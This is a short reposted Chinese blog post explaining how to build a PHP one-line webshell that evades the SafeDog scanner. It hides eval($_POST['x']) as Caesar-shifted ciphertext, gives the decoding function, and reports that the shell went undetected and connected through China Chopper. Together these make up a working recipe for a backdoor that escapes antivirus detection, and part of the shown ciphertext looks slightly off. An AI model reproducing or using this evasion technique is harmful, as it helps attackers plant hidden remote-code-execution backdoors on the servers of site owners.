0x1 先上图:
0x2 编写过程
这里必须强调一下我内心的感觉,小阔爱前两天也研究了过狗的一句话了,然后我突然觉得大家都在进步,我研究点啥呢?不如也试试以前因为觉得自己不懂代码,而不会研究的免杀shell吧。
很多人都在说过狗的方法,大致总结一下就是:函数封包,函数回调等。
我这里用到的一个方法就是编码,当然不是普通的base64编码了,是自己写了一个凯撒密码解密的函数,将eval($_POST['x']);转码为凯撒密文$arr="j{fq-)dUTXY}b.@"; ,存放到$str变量中。
然后写函数解码:
function tony($arr){ for($i=0;$i< strlen($arr);$i++){ $arr[$i]=chr(ord($arr[$i])-5); } return $arr; }
我的凯撒密码采用按ascii码进行向ascii增大的方向移动5位得到的密文,所以向ascii减小的方向移动5位来解码。
然后再用eval执行以下tony函数解密的$arr即可。
完整代码:
如图:
执行成功,我们用安全狗扫描一下:
OK,安全狗没有扫描到。
那么我们来用菜刀链接一下:
又出了情况,旧版菜刀链接被防火墙拦截,我问了下接地气,这个原因出在菜刀提交的数据被防火墙拦截了,让我去测试一下菜刀2016版的,测试结果:
可以连接上。
本文转载自:http://www.admintony.top/?p=1062